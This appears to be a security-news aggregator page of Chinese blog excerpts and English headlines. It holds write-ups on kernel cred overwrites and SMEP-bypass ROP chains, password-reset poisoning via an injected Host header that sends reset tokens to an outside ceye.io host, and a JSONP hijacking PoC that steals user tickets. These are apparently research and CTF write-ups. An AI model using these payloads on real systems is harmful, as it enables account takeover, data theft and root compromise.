Aggregator

本系列故事纯属虚构，如有雷同纯属巧合小B在实现了统一日志分析平台后，想到的第一个问题就是平台的安全性，用于安

“ 人是一切的开始，也是一切的基础。”

在给虚拟机分配磁盘时，为了不让分配的磁盘立马占用大量宿主机空间，可以使用精简分配（thin provisioning）。虚拟机的磁盘文件大小会随着磁盘中内容的增多而增加，但是却不会随着文件的删除而减少。这篇文章将介绍如何把虚拟机精简分配的磁盘空闲的空间返还给宿主机。

谈养生

People from around the globe are looking for instant and uninterrupted access to streaming services, on any device and in any location. But delivering high-quality streams that can easily scale to meet audience demand is no easy task. To better...

发表于看雪论坛 cred篇 每个线程在内核中都对应一个线程结构块thread_info thread_info中存在task_struct类型结构体 struct task_struct中存在cred结构体用来保存线程权限 攻击流程 定位某进程的cred结构体 将cred结构提结构体的uid~fsgid全部覆写为0(前28字节) 一. 利用步骤 1. 定位cred结构体 task_struct中存在char comm[TASK_COMM_LEN] comm字符串使用prctl函数的PR_SET_NAME自行设置 在内存中搜索被设置后的comm字符串，cred结构体地址就在附近 泄漏cred结构体地址，定向覆盖cred结构体 2. 进程权限被修改，变成root进程，执行system("/bin/sh")，弹出root shell 二. 驱动代码 #include <linux/init.h> #include <linux/module.h> #include <linux/cdev.h> #include <linux/device.h> #include <linux/fs.h> #include <linux/uaccess.h> #include <asm/cacheflush.h> #define CHANGE_POINT 0x100000 #define RW_READ 0x100001 #define RW_WRITE 0x100002 #define SET_MEM 0x100003 dev_t dev_id = 0; struct cdev cdev_0; struct class *dev_class; struct vunl { char *point; size_t size; } VUNL; long rw_any_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) { int ret = 0; switch (cmd) { case CHANGE_POINT: ret = copy_from_user(&VUNL, (struct vunl *)(arg), sizeof(struct vunl)); break; case RW_READ: ret = copy_to_user((char *)arg, (char *)VUNL.

这个未来是一座灯塔，区块链安全也追随这这座灯塔，​创造空间无限，市场空间无限。

The holiday shopping season is a bonanza for both shoppers and attackers. F5 Labs' David Warburton writes for ITProPortal, discussing the most commonly seen seasonal threats and how annual trends are shifting.

概念 DLL注入（英语：DLL injection）是一种计算机编程技术，它可以强行使另一个进程加载一个动态链接库以在其地址空间内运行指定代码[1]。在Windows操作系统上，每个进程都有独立的进程空间，即一个进程是无法直接操作另一个进程的数据的（事实上，不仅Windows，许多操作系统也是如此）

From the Lifx Switch smart switch to the Charmin RollBot to Kohler Setra Alexa-connected faucets, CES 2020 has introduced new...

The post Research Reveals Americans’ Perceptions of Device Security Amidst CES 2020 appeared first on McAfee Blog.

作者：Dennis_Ritchie 原文地址：https://learnku.com/articles/36655 多看看外面的世界 对于现在很多的 PHP 程序员

0x00 概述 在阅读了Host-Header欺骗在密码找回中的利用之后，我很受启发，拿着██大学的教务系统做了测试，发现了同类型漏洞存在，并且改进了漏洞利用方式使其具有更高的杀伤性。
由于██大学直接选择的是著名的U█P系统作为教务系统，因此这是个通用型的漏洞,理论上通杀各类U█P系统。
但对于该漏洞的利用需要受害者的交互还会在邮箱中留下记录，出了事一查一个准，因此妄想通过该漏洞拿到老师账号改成绩是不现实的。 0x01 背景：HOST头不可信 在编写WEB应用的时候，程序员往往不会直接把网站的host硬编码到代码中，而是通过动态手段获取（如$_SERVER['HTTP_HOST'])。 但是问题在于这个HOST并不是WEB应用自己带的,而是用户提供的！下面举个小例子来证明这一点。 看看以下代码 <?php var_dump($_SERVER['HTTP_HOST']); ?> 我们可以直接访问来测试它 获取如下结果



再用localhost.fbi.gov来访问（localhost.fbi.gov指向了127.0.0.1）

获取到的HOST就变成了localhost.fbi.gov
我们可以看到，这个HTTP_HOST是从用户提交的HOST头中获取的，因此是不可信的
所以，攻击者可以通过污染HOST头让服务器做出一些设计者意想不到的事情。
0x02 漏洞发现 首先我们注意到，██大学教务系统在使用IP或者域名访问来请求重置密码的时候，链接的HOST不一样 这是用IP访问的时候

这是用域名访问的时候
我们可以猜测，这个链接的开头是由HOST头动态拼接的，因此或许可以利用这一点来实现攻击，但是在我初次尝试的时候遇到了一点挫折
服务器拒绝了我提供的HOST头，直白的host deny不留一丝情面 但是只需要略施小计就会发现只要我们提供的HOST头里面包含了合法的HOST就能够通过它的认证
现在我们可以通过替换这个HOST头实施攻击了 首先在BurpSuite中做出如下替换
接着再申请找回密码，密码重置邮件就变成这样了
可以看到，攻击者可以构造特殊的链接，让受害者点击链接之后把重置token送到攻击者的服务器上 0x03 杀伤性提升 尽管看起来很有用，但我相信任何智力正常的用户都不会点击一个莫名其妙的链接，所以我们需要改进我们的payload来提高杀伤性。 众所周知，邮箱可以加载图片，如果我们想办法让邮箱自动加载图片，那岂不是可以在用户点开邮件的瞬间获取其重置token？ 抱着这样的想法，首先查看了邮件中的html代码并整理如下     <br><a href='http://[inject]/forgetPassword/modifyPassword?sid=[sid]&id=[id]'>         http://[inject]/forgetPassword/modifyPassword??sid=[sid]&id=[id]</a>         <br> 其中[inject]是我们的HOST头，是我们可控的部分

不难构造出html代码'></a><img src='http://[ceye子域名].ceye.io/[IP地址]:80/ 来让html变成这样
（由于[inject]在两个地方，笔者实在无法构造更完美的代码）     <br><a href='http://'></a><img src='http://[ceye子域名].ceye.io/[ip地址]:80//forgetPassword/modifyPassword?sid=[sid]&id=[id]'>         http://'></a><img src='http://[ceye子域名].ceye.io/[ip地址]:80//forgetPassword/modifyPassword??sid=[sid]&id=[id]</a>         <br> 我们来抓包改HOST测试下


发现这成功让QQ邮箱将这部分视为图片并尝试加载

接下来我们可以看到ceye接收到结果
至此我们已经成功减少了交互的复杂性，提升了该漏洞的杀伤能力
0x04 武器化 对于这类漏洞，必须要有一个server来接受参数，因此编写利用代码是很重要的。 我用Flask构建了一个简单的脚本，它能够开一个服务接收sid和id并自动化重置密码
同时返回图片降低受害者警惕，代码已经放在这里，可以参考使用

0x05 如何修复漏洞 把host是否合法的判断由包含换成等于

Awesome Essence 逻辑的人生

Now that we&rsquo;ve explored cloud security failures, we&rsquo;re going to explain defensive strategies laid out by deployment model.

利用SourceMap还原网站原始代码(前端)

作者：key

说明

现在越来越多网站使用前后端分离技术，利用Webpack技术将JS类拓展语言进行打包，当然很多都是配套使用，例如Vue（前端Javascript框架）+Webpack技术；

这种技术也在普及，并且转向常态化，对渗透测试人员来说极其不友好：

1.增加了前端代码阅读的时间（可读性很差） 2.由原因1间接造成了前端漏洞的审计困难性

但是也具备一定的好处：

1.采用这种模式，后端接口将完全暴露在JS文件中

除此之外，如果生成了Source Map文件可以利用该文件还原网站原始前端代码（关于技术名词的具体含义请自行查询百科）

主流浏览器都自带解析Source Map文件功能（开发者工具-Sources【火狐下是调试器】）：

展开可以看见具体文件和代码：

但是文件过多的情况下，单个查看繁琐，不便于搜索（浏览器的开发者工具支持全局文件搜索，但搜索速度较慢），使用restore-source-tree可以解决这一问题。

restore-source-tree 安装

原作者的有BUG，使用国外友人修复后的版本：https://github.com/laysent/restore-source-tree，安装步骤如下：

git clone https://github.com/laysent/restore-source-tree cd restore-source-tree sudo npm install -g Source Map文件还原

在这类JS文件下通常会有一个注释：

map文件就是js文件所在目录下，拼接URL即可访问，将其下载下来：

wget http://hostname/static/js/app.fedfe85b2fdd8cf29dc7.js.map

restore-source-tree进行还原：

# -o 参数是指定输出目录，若不适用则为默认的output目录 restore-source-tree app.fedfe85b2fdd8cf29dc7.js.map

成功获得原代码：

Reference

https://yukaii.tw/blog/2017/02/21/restore-source-code-from-sourcemap-file/

动态JS劫持用户信息

Webpack+JSONP劫持

作者：key

注：本文已对敏感信息脱敏化，如有雷同纯属巧合。

前言

在做测试的时候发现一个请求：

POST /user/getUserInfo HTTP/1.1 Host: xxxxx Cookie: xxxx ticket=xxxxx

其对应返回的信息包含了我本身用户的敏感信息：手机号、姓名、邮箱…

通过BurpSuite的插件Logger++搜索发现该ticket值居然出现在了JS文件中：

确定漏洞

通过测试我发现以上所述请求中的Cookie为无效请求头，后端不对齐校验，但对ticket校验，也就说明此处的ticket代表了获取用户信息的关键参数，换种说法：当你知道用户的ticket参数即可获取该用户信息。

判断JS动静态

当我在Logger++插件搜索到ticket值存在JS文件内容时，我的第一想法就是这个JS文件为动态类型，其文件内容跟随用户凭证字段的变化而变化。

测试：删除Cookie字段，结果：ticket参数值消失，由此可以判断该JS内容为动态类型。

再尝试将测试账户A的Cookie字段内容替换为测试账户B的Cookie字段内容，结果：ticket参数值变为测试账户B用户的对应值，由此可以判断该JS文件路径是固定的，并不是动态路径。

Webpack+JSONP劫持

已知JS文件路径为：https://website/app.xxxxx.js

查看其文件内容发现其被Webpack打包过：

那么我们想要劫持这个JS文件内容其实就可以使用JSONP的PoC代码（因为这段JS文件内容就是自定义函数+传入参数）：

<script> function webpackJsonp(data) { alert(data) } </script> <script src="https://website/app.xxxxx.js"></script>

但这样得不到我们想要的ticket值，简单的看了下JS代码，这段JS代码内容的格式是这样的：

webpackJsonp 函数传入两个参数：第一个参数毫无用处，第二个参数传入的值包含了我们想要的ticket值。

那以上代码就可以这样修改：

<script> function webpackJsonp(data, data1) { alert(data1) } </script> <script src="https://website/app.xxxxx.js"></script>

但我们还是没得到我们想要的信息：

因为第二段参数传入的值还需要进行解析，我发现这段值内容就是一段JSON对象，而对象的每个属性都在定义一个函数：

寻找ticket所在函数位置，发现其在jbTV: function...内，知道了所在函数位置，PoC代码只需要这样进行构建：

<script> function webpackJsonp(data, data1) { alert(data1['jbTV']) } </script> <script src="https://website/app.xxxxx.js"></script>

访问，成功获取：

后面只需要稍微的加个正则就可以了～

攻击方式

用户登录状态，访问该漏洞页面，触发即可获取到ticket值，将该值带入以上所列请求中即可越权获取用户信息

结尾

心细一点，漏洞就在眼前，

随着大数据时代的到来，带了很多的便利，但是也带来了更多的风险，作为一名安全行业工作者，对于这种变革更是体会深刻，笔者从事的是金融行业的安全工作，在此从数据安全工作落地的角度来聊一聊数据安全治理及具体工作中碰到的问题。

发表于看雪论坛 ret2usr CR4篇 smep: smep是内核的一种保护措施, 使得内核不可执行用户态代码 内核通过CR4寄存器的第20位来控制smep, 第20位为0时，smep被关闭 攻击流程 提前在用户态代码中构造进程提权代码(get_root) ROP技术修改CR4第20位数据为0(关闭smep), 通常使用 mov cr4, 0x6f0 修改 rip 直接指向用户态提权代码,实现进程提权 一. 判断是否开启smep 查看 boot.sh qemu-system-x86_64 \ -kernel bzImage \ -initrd rootfs.img \ -append "console=ttyS0 root=/dev/ram rdinit=/sbin/init" \ -cpu qemu64,+smep,+smap \ -nographic \ -gdb tcp::1234 smep, smap 在boot.sh -cpu选项内进行设置 二. ROP链构造 ROP[i++] = 0xffffffff810275f1 + offset; //pop rax; ret ROP[i++] = 0x6f0; ROP[i++] = 0xffffffff8123ed93 + offset; //pop rcx; ret ROP[i++] = 0; ROP[i++] = 0xffffffff81003c0e + offset; //mov cr4, rax ; push rcx ; popfq ; pop rbp ; ret ROP[i++] = 0; ROP[i++] = (size_t)get_root; 三.

本系列故事纯属虚构，如有雷同纯属巧合平台实现前的说明小B在给老板汇报了"统一日志分析平台"项目后，老板拍板立